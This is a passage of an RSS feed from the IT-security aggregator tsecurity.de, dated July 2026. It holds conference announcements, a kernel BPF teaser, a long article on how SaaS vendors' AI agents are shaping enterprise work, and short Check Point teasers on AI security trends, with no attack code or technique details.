<link>https://tsecurity.de/de/3668721/it-security-video/what-to-expect-at-black-hat-usa-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668721/it-security-video/what-to-expect-at-black-hat-usa-2026/</guid>
<pubDate>Tue, 14 Jul 2026 19:00:21 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Black Hat - Bewertung: 8x - Views:51 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/HopnPmgHUis?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Over 20,000 practitioners. 100+ hands-on training courses. Peer-reviewed research that doesn't exist anywhere else yet. Black Hat USA runs August 1-6, 2026 in Las Vegas, and this year's agenda is shaping up to be the most exciting one yet.<br />
 <br />
Black Hat USA 2026 brings together the cybersecurity community for six days of training, research, and hands-on evaluation. Here's what you're walking into:<br />
<br />
• Training (August 1-4): 100+ expert-led courses taught by practitioners who've deployed these techniques in live environments. This year's expanded AI security track covers securing LLMs, defending against autonomous agents, and building detection pipelines that work at machine speed.<br />
• Briefings (August 5-6): Peer-reviewed research selected by an independent review board. AI agent exploitation. Post-quantum cryptography. Supply chain attacks. Detection engineering. The findings you'll hear don't exist in published form yet; you're getting them first.<br />
• Business Hall (August 4-6): 400+ sponsors and exhibitors. The practitioners walking that floor are coming straight out of Briefings and Trainings, so they know exactly what questions to ask. This is where real evaluation happens.<br />
• Summits (August 4): Six full-day, domain-specific programs including the CISO Summit, AI Summit, Financial Services Security Summit, Healthcare Summit, and more. You're not in a general conference audience; you're with peers who understand the specific challenges you're facing.<br />
• New this year: The Interface (hands-on demos and scenario-based learning), Arsenal Labs (20 dedicated tool demonstration sessions), Cyber War Forum (senior leader discussions under Chatham House rules), Drone Zone, Cyber District, and Black Hat(HER).<br />
<br />
Regular registration pricing is active through July 17th, 2026.<br />
Register at blackhat.com<br />
One Step Ahead.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Call for topics for the 2026 Maintainers Summit]]></title>
<description><![CDATA[The Maintainers Summit is an annual, invitation-only gathering of kernel
developers and maintainers to discuss development-process issues; see LWN's 2025 Maintainers Summit coverage for an
example.  The call for
topics for the 2026 gathering (Prague, October 8) has gone out.
One of the best ways ...]]></description>
<link>https://tsecurity.de/de/3668230/linux-tipps/call-for-topics-for-the-2026-maintainers-summit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668230/linux-tipps/call-for-topics-for-the-2026-maintainers-summit/</guid>
<pubDate>Tue, 14 Jul 2026 16:10:48 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Maintainers Summit is an annual, invitation-only gathering of kernel
developers and maintainers to discuss development-process issues; see <a href="https://lwn.net/Articles/1049982/">LWN's 2025 Maintainers Summit coverage</a> for an
example.  The <a href="https://lwn.net/ml/all/alW3eJ9x6iJ8Juhi@mit.edu">call for
topics</a> for the 2026 gathering (Prague, October 8) has gone out.
One of the best ways to obtain an invitation to the Summit is with a good
topic proposal.  For best consideration, topics should be submitted before
July 24.]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] Sending packets directly from BPF]]></title>
<description><![CDATA[Tetragon, the BPF-based security monitoring tool,
uses BPF to monitor different aspects of a running kernel and
enforce user-specified policies. It sends its data to a user-space process,
which forwards the data to a central monitoring service elsewhere in the
network, however. This
presents a po...]]></description>
<link>https://tsecurity.de/de/3668094/linux-tipps/sending-packets-directly-from-bpf/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668094/linux-tipps/sending-packets-directly-from-bpf/</guid>
<pubDate>Tue, 14 Jul 2026 15:26:31 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>
<a href="https://tetragon.io/">
Tetragon</a>, the BPF-based security monitoring tool,
uses BPF to monitor different aspects of a running kernel and
enforce user-specified policies. It sends its data to a user-space process,
which forwards the data to a central monitoring service elsewhere in the
network, however. This
presents a point of vulnerability: if an attacker can kill Tetragon's user-space
agent, it won't be able to properly report on the situation. Song Liu, Mahé
Tardy, and Liam Wiseheart spoke about their work removing the need for the
user-space agent at the 2026
<a href="https://events.linuxfoundation.org/lsfmmbpf/">
Linux Storage, Filesystem, Memory-Management, and
BPF Summit</a>.
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How AI agents are shaping the future of work]]></title>
<description><![CDATA[I attended several major technology conferences in 2025 where the first AI agents embedded in enterprise SaaS platforms were announced. Some of these agents showed promise and a glimpse into the future of work, while others looked like natural language extensions of a platform’s existing function...]]></description>
<link>https://tsecurity.de/de/3667534/it-security-nachrichten/how-ai-agents-are-shaping-the-future-of-work/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667534/it-security-nachrichten/how-ai-agents-are-shaping-the-future-of-work/</guid>
<pubDate>Tue, 14 Jul 2026 12:07:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">I attended several major technology conferences in 2025 where the first AI agents embedded in enterprise SaaS platforms were announced. Some of these agents showed promise and a glimpse into the future of work, while others looked like natural language extensions of a platform’s existing functionality.  </p>



<p class="wp-block-paragraph">At the end of 2025, Anthropic and OpenAI launched new AI models and code-generating capabilities. More developers tried <a href="https://www.infoworld.com/article/4058076/vibe-coding-and-the-future-of-software-development.html">vibe coding</a>, and some platforms launched <a href="https://www.infoworld.com/article/4166817/vibe-coding-or-spec-driven-development.html">spec-driven development capabilities</a>. By February 2026, even The New York Times reported that <a href="https://www.nytimes.com/2026/02/18/opinion/ai-software.html">the AI disruption had arrived</a>, noting that code generators were building “apps that may be flawed, but credible.”</p>



<p class="wp-block-paragraph">Wall Street investors took notice of the code-generation improvements and other disruptive factors, driving a selloff in SaaS stocks, now referred to as the “<a href="https://www.bloomberg.com/news/articles/2026-02-03/-get-me-out-traders-dump-software-stocks-as-ai-fears-take-hold">SaaSpocalypse</a>.” Part of their concern stemmed from the belief that CIOs would use AI to <a href="https://www.cio.com/article/4148303/cios-rethink-softwares-future-as-ai-agents-advance.html">write software that would replace SaaS solutions</a>.</p>



<h2 class="wp-block-heading">AI innovations from SaaS and solution providers</h2>



<p class="wp-block-paragraph">But I thought differently and wrote a response in my article asking whether <a href="https://www.cio.com/article/4146669/is-ai-the-end-of-saas-as-we-know-it.html">AI is the end of SaaS as we know it</a>. CIOs might use AI to accelerate application modernization, but I doubt they would replace their ERP, CRM, and even smaller SaaS point solutions by building them.</p>



<p class="wp-block-paragraph">Instead, I believed it would be SaaS companies that would take the most advantage of AI code-generation capabilities.</p>



<p class="wp-block-paragraph">This hypothesis drove me to attend nine conferences this spring to see how SaaS companies were launching AI agents and defining a new future of work. I wrote eight articles on <a href="https://drive.starcio.com/cios-need-to-know">what CIOs need to know</a> about data management, agile organizations, marketing, ERPs, critical process management, and other evolutions to plan for in the AI era.</p>



<p class="wp-block-paragraph">Now, looking across all nine conferences, I can draw some conclusions about how AI agents are shaping the future of work. Here are my learnings and what CIOs need to consider when evaluating and deploying AI agents in the workplace.</p>



<h2 class="wp-block-heading">Agentic, human-in-the-middle, or augmenting human?</h2>



<p class="wp-block-paragraph">SaaS companies have very distinct perspectives on the future of work, including the extent to which humans will play which roles and whether and how quickly we’ll see agentic, fully automated work.</p>



<p class="wp-block-paragraph">For example, Atlassian proclaimed, “<a href="https://www.atlassian.com/company/events">step into the future of human-AI collaboration</a>,” while SAP unveiled “<a href="https://news.sap.com/2026/05/sap-sapphire-sap-unveils-autonomous-enterprise/">the autonomous enterprise</a>.” Snowflake aimed to “<a href="https://www.snowflake.com/en/summit/">make AI real for business</a>,” while Appian targeted “<a href="https://www.appianworld.com/">serious AI built on process</a>.”</p>



<p class="wp-block-paragraph">These vendors’ marketers had to decide whether to lead with AI, people, or business in their messaging, but so must CIOs as they contemplate their AI strategies and how to get employees to fully adopt AI agents.</p>



<p class="wp-block-paragraph">Some CIOs see a fully automated agentic AI as the future, with human-in-the-middle as a transitional phase as departments build trust in AI agents’ decision-making and automation capabilities.</p>



<p class="wp-block-paragraph">Other CIOs see AI more as a tool that delivers productivity improvements by augmenting human decision-making capabilities. Many of these CIOs see human augmentation as essential to supporting critical thinking, innovation, and creativity.</p>



<p class="wp-block-paragraph"><a href="https://www.deloitte.com/us/en/what-we-do/capabilities/applied-artificial-intelligence/content/state-of-ai-in-the-enterprise.html">Deloitte’s State of AI Report</a>, published in January, provides a benchmark. It states that 36% of IT leaders expect at least 10% of their jobs to be fully automated in the next year, and 82% expect to reach that benchmark in three years.</p>



<p class="wp-block-paragraph">Many organizations will have a mix of AI agents, choosing automation where reliability at scale is possible, but opting for human augmentation in operationally critical or customer-facing domains. But how CIOs position AI agents is not only an operational strategy; it’s also a cultural statement that shapes employees’ embrace of AI and whether <a href="https://drive.starcio.com/2026/03/ai-leadership-job-at-risk-or-career-opportunity/">detractors vocalize job-loss fears</a>.</p>



<p class="wp-block-paragraph">In the short term, it will also weigh in on which AI agents to use from different partners and which areas to build in-house.</p>



<h2 class="wp-block-heading">Many options to test and deploy AI agents</h2>



<p class="wp-block-paragraph">Many solution providers are demonstrating significantly more AI agents this year. For example, SAP went from <a href="https://drive.starcio.com/2026/05/autonomous-enterprise-ai-cios/">40 Joule Agents in 2025 to over 200 in 2026.</a> Three technology capabilities are fueling this significant growth:</p>



<ul class="wp-block-list">
<li>Adobe, Appian, Boomi, Cisco, Domo, Salesforce, SAP, Snowflake, and others offer <a href="https://www.infoworld.com/article/3497094/does-your-organization-need-a-data-fabric.html">data fabrics</a> and <a href="https://www.infoworld.com/article/3487711/the-definitive-guide-to-data-pipelines.html">data-pipeline</a> capabilities to connect data sources outside the primary workflows supported by their platforms. Appian, Pega, Quickbase, and SAP also centralize business process automation, an important starting point for developing AI agents.  </li>



<li><a href="https://www.infoworld.com/article/4124612/5-requirements-for-using-mcp-servers-to-connect-ai-agents.html">MCP servers</a> enable integration and communication between AI agents and are used to facilitate multistep agentic workflows. Virtually all the companies announcing major investments in AI agents are also announcing MCP integration capabilities and related partnerships.</li>



<li>Solution providers are not just using AI code-generating capabilities; many are launching their own AI agent development tools. The first beneficiaries of these development tools are the solution providers themselves and their integration partners, who use them to accelerate the development of AI agents and make them available to customers.</li>
</ul>



<p class="wp-block-paragraph">The result is that <a href="https://drive.starcio.com/2025/10/ai-agents-definitive-guide-saas-security-titans/">CIOs will have many options about which agents to test</a>, but will have to dedicate analysts to understand the capability, cost, and compliance trade-offs. Additionally, expect AI agent capabilities to evolve significantly over the next few years, so CIOs should continuously revisit their decisions regarding deployed AI agents, focusing on performance, benefits, and ROI.</p>



<p class="wp-block-paragraph">CIOs should also watch for signs of <a href="https://www.cio.com/article/1247890/7-steps-for-turning-shadow-it-into-a-competitive-edge.html">shadow AI</a> and employee confusion about which AI agents to experiment with on different platforms. The AI strategy should include a transparent, defined process for selecting, reviewing, evaluating, procuring, deploying, driving adoption, monitoring, and collecting end-user feedback around AI agents.</p>



<h2 class="wp-block-heading">AI development capabilities for engineers and citizen builders</h2>



<p class="wp-block-paragraph">The apparent ease-of-use of AI code generators may lead some engineering teams to <a href="https://www.cio.com/article/4097339/your-next-big-ai-decision-isnt-build-vs-buy-its-how-to-combine-the-two.html">build AI agents rather than buy them</a> from SaaS providers. But CIOs should quickly realize that coding is just one step in developing AI agents, and that aggressively pursuing a build strategy can lead to <a href="https://www.cio.com/article/4178324/7-sources-of-ai-debt-and-how-to-avoid-them.html">AI debt</a> and <a href="https://www.cio.com/article/4107377/cios-will-underestimate-ai-infrastructure-costs-by-30.html">increased AI costs</a>.</p>



<p class="wp-block-paragraph">DevOps teams can code AI agents using tools such as Claude, Codex, Lovable, and Replit — a do-it-yourself approach. Some SaaS companies are providing an alternative, with AI agent development tools that leverage the data, infrastructure, and governance baked into their platforms. Many of these development tools offer flexibility, allowing developer teams to select AI models and development environments.</p>



<p class="wp-block-paragraph">Examples of new and enhanced AI development tools I saw at conferences this quarter include:</p>



<ul class="wp-block-list">
<li><a href="https://appian.com/blog/2025/appian-25-4-release-enterprise-ai-agents">Appian Composer and Agent Studio</a></li>



<li><a href="https://www.atlassian.com/software/rovo-dev">Atlassian Rovo Dev</a></li>



<li><a href="https://boomi.com/platform/companion/">Boomi Companion</a></li>



<li><a href="https://www.cisco.com/site/us/en/solutions/artificial-intelligence/agentic-ops/cloud-control-studio/index.html">Cisco Cloud Control Studio</a></li>



<li><a href="https://www.domo.com/app-catalyst">Domo App Catalyst</a></li>



<li><a href="https://www.pega.com/about/news/press-releases/pega-harnesses-best-practices-and-ai-coding-agents-build-apps-mission">Pega Infinity Studio</a></li>



<li><a href="https://www.quickbase.com/pave">Quickbase Pave</a></li>



<li><a href="https://www.snowflake.com/en/product/snowflake-coco/">Snowflake CoCo</a></li>



<li><a href="https://www.sap.com/products/artificial-intelligence/joule-studio.html">SAP Joule Studio</a>.</li>
</ul>



<p class="wp-block-paragraph">I also reviewed <a href="https://www.nutanix.com/solutions/ai">Nutanix Agentic AI</a>, a platform-as-a-service for accelerating the deployment of agentic AI workloads, and <a href="https://www.adobe.com/products/firefly/features/ai-assistant.html">Adobe Firefly AI Assistant</a> for creatives.</p>



<p class="wp-block-paragraph">These development tools can target different audiences. Some look like low-code development tools targeted at software developers, whereas others are <a href="https://drive.starcio.com/2026/05/low-code-in-the-ai-era-cios-need-to-know/">no-code and enable citizen developers</a>, i.e., businesspeople, to <a href="https://www.cio.com/article/4176062/cios-are-enlisting-business-users-to-vibe-code-their-own-apps.html">develop applications and agents</a>. Additionally, some of these tools support spec-driven development and generate artifacts such as product requirement documents (PRDs), data models, and testing capabilities.</p>



<p class="wp-block-paragraph">Before commissioning AI development for apps and agents, CIOs should sponsor proofs of technical, data, modeling, security, and governance capabilities.</p>



<h2 class="wp-block-heading">The context layer powering AI agents</h2>



<p class="wp-block-paragraph">Between AI agents and the enterprise’s intelligence, including structured data sources, defined business processes, and agent interactions (both human-to-agent and agent-to-agent), lies an evolving “context layer.”</p>



<p class="wp-block-paragraph">This layer refers to the enterprise knowledge that AI agents draw on when evaluating signals and recommending or taking actions. Context may include a knowledge graph, a semantic layer, cleansed document repositories, and other knowledge bases.</p>



<p class="wp-block-paragraph">The context layer, skills, tools, out-of-the-box agents, and governance capabilities are some areas to review where solution providers differentiate. Some examples: </p>



<ul class="wp-block-list">
<li>Many support the <a href="https://open-semantic-interchange.org/">Open Semantic Interchange</a>, and some brand their context layers, such as the <a href="https://www.atlassian.com/platform/teamwork-graph">Atlassian Teamwork Graph</a>, <a href="https://boomi.com/knowledge-hub-early-access/">Boomi Knowledge Hub</a>, and the <a href="https://www.sap.com/products/artificial-intelligence/knowledge-graph.html">SAP Knowledge Graph</a>.</li>



<li>Some are branding their guardrails, such as <a href="https://business.adobe.com/products/brand-intelligence.html">Adobe’s AI Brand Intelligence</a>, <a href="https://appian.com/products/platform/artificial-intelligence">Appian’s Private AI</a>, and <a href="https://www.quickbase.com/intelligence-pack/ai-control-center">Quickbase AI Control Center</a>.</li>



<li>To manage AI agents at scale, some are extending the notion of data catalogs and other governance tools to the AI domain with products such as <a href="https://boomi.com/platform/connect/">Boomi Connect</a>, <a href="https://www.sap.com/products/artificial-intelligence/ai-agent-hub.html">SAP AI Agent Hub</a>, and <a href="https://www.snowflake.com/en/product/features/horizon/">Snowflake Horizon Catalog</a>.</li>
</ul>



<p class="wp-block-paragraph">CIOs should recognize that while solution providers will compete on capabilities, the real “secret sauce” of the context layer lies in the company’s trusted data, well-defined business processes, and employee adoption of AI agents.</p>



<h2 class="wp-block-heading">Conversational user experiences and coworkers</h2>



<p class="wp-block-paragraph">AI agents use the context layer, but also tap into skills, which encode the procedures they can follow, and tools, which prescribe the actions they can take. Before AI agents are ready to pilot, their governance, including permissions, approval gates, and other guardrails, must be defined. Other capabilities to look for when defining AI agents include orchestration, testing evals, and observability.</p>



<p class="wp-block-paragraph">In 2025, many solution providers bolted on AI agents to their existing user experiences. This year, many solution providers showcased new conversational user experiences that employees can use instead of traditional ones built with forms, flows, reports, and static dashboards. Conversational user experiences are where AI agents and people come together, whether it’s human-in-the-middle or human augmentation.</p>



<p class="wp-block-paragraph">Solution providers also grouped their AI agents into assistants or coworkers. For example, <a href="https://business.adobe.com/products/cx-enterprise-coworker.html">Adobe CX Coworker</a> illustrates human augmentation, helping marketers manage campaigns with prompts and monitor their performance. SAP launched <a href="https://www.sap.com/products/artificial-intelligence/ai-assistant.html">Joule Assistants</a> across several business functions, including finance, human capital, supply chain, and customer experience. Other assistants, such as <a href="https://docs.appian.com/suite/help/26.5/appian-ai-copilot.html">Appian AI Copilot</a>, <a href="https://www.atlassian.com/software/rovo">Atlassian Rovo</a>, <a href="https://www.cisco.com/site/us/en/solutions/artificial-intelligence/ai-assistant/index.html">Cisco AI Assistant</a>, <a href="https://www.nutanix.com/blog/nutanix-intelligent-virtual-agent">Nutanix NIVA</a>, and <a href="https://www.snowflake.com/en/product/snowflake-cowork/">Snowflake CoWork</a>, offer AI-first user experiences to assist different end-user types.</p>



<p class="wp-block-paragraph">CIOs should demo these <a href="https://www.infoworld.com/article/4178415/what-will-ai-first-ux-look-like.html">AI-first user experiences</a> to glimpse the future of work.</p>



<p class="wp-block-paragraph">Developers are already getting used to these experiences through code generators and vibe coding tools. Now, similar capabilities are being tailored across all business functions. CIOs should ramp up their <a href="https://www.cio.com/article/4082282/preparing-your-workforce-for-ai-agents-a-change-management-guide.html">change management programs</a> to accelerate the adoption of these AI capabilities.</p>



<p class="wp-block-paragraph">Solution providers are showcasing AI capabilities that can help CIOs <a href="https://drive.starcio.com/2026/04/ai-reshaping-business-not-digital-transformation-yet/">reshape their businesses</a>. But in Q2, there were only a few examples of how AI can help CIOs drive growth, evolve business models, or embed AI into customer-facing products. I expect to see a wave of further AI innovations that will go beyond productivity improvements and efficiencies and help CIOs pursue <a href="https://drive.starcio.com/2025/02/cios-drive-genai-digital-transformation/">growth-driving digital transformation strategies</a>.  </p>



<p class="wp-block-paragraph"><em>Sacolick travelled to conferences mentioned in this article as a guest of Adobe, Appian, Atlassian, Domo, Nutanix, SAP, and Snowflake. In addition, he was hired by Quickbase to speak at its conference.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Greenhat Announces Successful Delegation at Web Summit Vancouver 2026]]></title>
<description><![CDATA[Vancouver, Canada, July 14th, 2026, CyberNewswire Canadian Cybersecurity Leaders Celebrate Successful Web Summit Vancouver 2026 and Growing Canada–Korea Collaboration The Canadian Cyber Zone brought together cybersecurity, quantum security, application security, compliance, and international inno...]]></description>
<link>https://tsecurity.de/de/3667492/it-security-nachrichten/greenhat-announces-successful-delegation-at-web-summit-vancouver-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667492/it-security-nachrichten/greenhat-announces-successful-delegation-at-web-summit-vancouver-2026/</guid>
<pubDate>Tue, 14 Jul 2026 11:54:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Vancouver, Canada, July 14th, 2026, CyberNewswire Canadian Cybersecurity Leaders Celebrate Successful Web Summit Vancouver 2026 and Growing Canada–Korea Collaboration The Canadian Cyber Zone brought together cybersecurity, quantum security, application security, compliance, and international innovation leaders during one of Canada’s largest technology events The Canadian Cyber Zone announced the successful completion of its participation at Web […]</p>
<p>The post <a href="https://cybersecuritynews.com/greenhat-announces-successful-delegation-at-web-summit-vancouver-2026/">Greenhat Announces Successful Delegation at Web Summit Vancouver 2026</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Greenhat Announces Successful Delegation at Web Summit Vancouver 2026]]></title>
<description><![CDATA[Vancouver, Canada, July 14th, 2026, CyberNewswire Canadian Cybersecurity Leaders Celebrate Successful Web Summit Vancouver 2026 and Growing Canada–Korea Collaboration The Canadian Cyber Zone brought together cybersecurity, quantum security, application security, compliance, and international inno...]]></description>
<link>https://tsecurity.de/de/3667491/it-security-nachrichten/greenhat-announces-successful-delegation-at-web-summit-vancouver-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667491/it-security-nachrichten/greenhat-announces-successful-delegation-at-web-summit-vancouver-2026/</guid>
<pubDate>Tue, 14 Jul 2026 11:54:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Vancouver, Canada, July 14th, 2026, CyberNewswire Canadian Cybersecurity Leaders Celebrate Successful Web Summit Vancouver 2026 and Growing Canada–Korea Collaboration The Canadian Cyber Zone brought together cybersecurity, quantum security, application security, compliance, and international innovation leaders during one of Canada’s largest technology events The Canadian Cyber Zone announced the successful completion of its participation at Web […]</p>
<p>The post <a href="https://gbhackers.com/greenhat-announces-successful-delegation-at-web-summit-vancouver-2026/">Greenhat Announces Successful Delegation at Web Summit Vancouver 2026</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Greenhat Announces Successful Delegation at Web Summit Vancouver 2026]]></title>
<description><![CDATA[Vancouver, Canada, 14th July 2026, CyberNewswire This article has been indexed from Hackread – Cybersecurity News, Data Breaches, AI and More Read the original article: Greenhat Announces Successful Delegation at Web Summit Vancouver 2026
Read more →
The post Greenhat Announces Successful Delegat...]]></description>
<link>https://tsecurity.de/de/3667276/it-security-nachrichten/greenhat-announces-successful-delegation-at-web-summit-vancouver-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667276/it-security-nachrichten/greenhat-announces-successful-delegation-at-web-summit-vancouver-2026/</guid>
<pubDate>Tue, 14 Jul 2026 10:24:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Vancouver, Canada, 14th July 2026, CyberNewswire This article has been indexed from Hackread – Cybersecurity News, Data Breaches, AI and More Read the original article: Greenhat Announces Successful Delegation at Web Summit Vancouver 2026</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/greenhat-announces-successful-delegation-at-web-summit-vancouver-2026/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/greenhat-announces-successful-delegation-at-web-summit-vancouver-2026/">Greenhat Announces Successful Delegation at Web Summit Vancouver 2026</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Greenhat Announces Successful Delegation at Web Summit Vancouver 2026]]></title>
<description><![CDATA[Vancouver, Canada, 14th July 2026, CyberNewswire]]></description>
<link>https://tsecurity.de/de/3667191/it-security-nachrichten/greenhat-announces-successful-delegation-at-web-summit-vancouver-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667191/it-security-nachrichten/greenhat-announces-successful-delegation-at-web-summit-vancouver-2026/</guid>
<pubDate>Tue, 14 Jul 2026 09:41:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Vancouver, Canada, 14th July 2026, CyberNewswire]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Security Threats in 2026: Annual Insights from Check Point Research]]></title>
<description><![CDATA[Key Takeaways Vulnerability response times have collapsed from days to hours. AI can reason about code well enough to generate working exploits at scale, so defenders now face patch windows of 12 to 72 hours instead of the traditional timeframe…
Read more →
The post AI Security Threats in 2026: A...]]></description>
<link>https://tsecurity.de/de/3666682/it-security-nachrichten/ai-security-threats-in-2026-annual-insights-from-check-point-research/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666682/it-security-nachrichten/ai-security-threats-in-2026-annual-insights-from-check-point-research/</guid>
<pubDate>Tue, 14 Jul 2026 03:38:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Key Takeaways Vulnerability response times have collapsed from days to hours. AI can reason about code well enough to generate working exploits at scale, so defenders now face patch windows of 12 to 72 hours instead of the traditional timeframe…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/ai-security-threats-in-2026-annual-insights-from-check-point-research/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/ai-security-threats-in-2026-annual-insights-from-check-point-research/">AI Security Threats in 2026: Annual Insights from Check Point Research</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Security Threats in 2026: Insights from Check Point Research]]></title>
<description><![CDATA[Key Takeaways Vulnerability response times have collapsed from days to hours. AI can reason about code well enough to generate working exploits at scale, so defenders now face patch windows of 12 to 72 hours instead of the traditional timeframe Your exposed AI infrastructure is being actively pro...]]></description>
<link>https://tsecurity.de/de/3666663/it-security-nachrichten/ai-security-threats-in-2026-insights-from-check-point-research/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666663/it-security-nachrichten/ai-security-threats-in-2026-insights-from-check-point-research/</guid>
<pubDate>Tue, 14 Jul 2026 03:08:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1600" height="800" src="https://blog.checkpoint.com/wp-content/uploads/2026/07/Blog-banner_AI-Security-Report-2026_800x400-1-1.png" class="webfeedsFeaturedVisual wp-post-image" alt="" link_thumbnail="" decoding="async" fetchpriority="high" srcset="https://blog.checkpoint.com/wp-content/uploads/2026/07/Blog-banner_AI-Security-Report-2026_800x400-1-1.png 1600w, https://blog.checkpoint.com/wp-content/uploads/2026/07/Blog-banner_AI-Security-Report-2026_800x400-1-1-300x150.png 300w, https://blog.checkpoint.com/wp-content/uploads/2026/07/Blog-banner_AI-Security-Report-2026_800x400-1-1-1024x512.png 1024w, https://blog.checkpoint.com/wp-content/uploads/2026/07/Blog-banner_AI-Security-Report-2026_800x400-1-1-768x384.png 768w, https://blog.checkpoint.com/wp-content/uploads/2026/07/Blog-banner_AI-Security-Report-2026_800x400-1-1-1536x768.png 1536w, https://blog.checkpoint.com/wp-content/uploads/2026/07/Blog-banner_AI-Security-Report-2026_800x400-1-1-400x200.png 400w, https://blog.checkpoint.com/wp-content/uploads/2026/07/Blog-banner_AI-Security-Report-2026_800x400-1-1-600x300.png 600w, https://blog.checkpoint.com/wp-content/uploads/2026/07/Blog-banner_AI-Security-Report-2026_800x400-1-1-800x400.png 800w, https://blog.checkpoint.com/wp-content/uploads/2026/07/Blog-banner_AI-Security-Report-2026_800x400-1-1-1200x600.png 1200w, https://blog.checkpoint.com/wp-content/uploads/2026/07/Blog-banner_AI-Security-Report-2026_800x400-1-1-1320x660.png 1320w" sizes="(max-width: 1600px) 100vw, 1600px"><p>Key Takeaways Vulnerability response times have collapsed from days to hours. AI can reason about code well enough to generate working exploits at scale, so defenders now face patch windows of 12 to 72 hours instead of the traditional timeframe Your exposed AI infrastructure is being actively probed right now. Model servers, inference endpoints, and agent control panels are facing the internet, and most security teams don’t know they’re there Data leakage through approved AI use doubled in one year. Employees sharing context with generative AI to get useful answers are exposing credentials and source code in ordinary workflows, no […]</p>
<p>The post <a href="https://blog.checkpoint.com/ai-security/ai-security-threats-in-2026-insights-from-check-point-research/">AI Security Threats in 2026: Insights from Check Point Research</a> appeared first on <a href="https://blog.checkpoint.com/">Check Point Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Security Threats in 2026: Insights from Check Point Research]]></title>
<description><![CDATA[Key Takeaways Vulnerability response times have collapsed from days to hours. AI can reason about code well enough to generate working exploits at scale, so defenders now face patch windows of 12 to 72 hours instead of the traditional timeframe…
Read more →
The post AI Security Threats in 2026: I...]]></description>
<link>https://tsecurity.de/de/3666662/it-security-nachrichten/ai-security-threats-in-2026-insights-from-check-point-research/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666662/it-security-nachrichten/ai-security-threats-in-2026-insights-from-check-point-research/</guid>
<pubDate>Tue, 14 Jul 2026 03:08:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Key Takeaways Vulnerability response times have collapsed from days to hours. AI can reason about code well enough to generate working exploits at scale, so defenders now face patch windows of 12 to 72 hours instead of the traditional timeframe…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/ai-security-threats-in-2026-insights-from-check-point-research/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/ai-security-threats-in-2026-insights-from-check-point-research/">AI Security Threats in 2026: Insights from Check Point Research</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Konferenzen für Software-Entwicklung 2026 in Deutschland - Informatik Aktuell]]></title>
<description><![CDATA[Security Summit. Ort: Karlsruhe; Termin: 19. März 2026; Schwerpunkt: IT-Sicherheit und Cybersecurity; Kurzbeschreibung: Expertengespräche und ...]]></description>
<link>https://tsecurity.de/de/3665846/it-security-nachrichten/konferenzen-fuer-software-entwicklung-2026-in-deutschland-informatik-aktuell/</link>
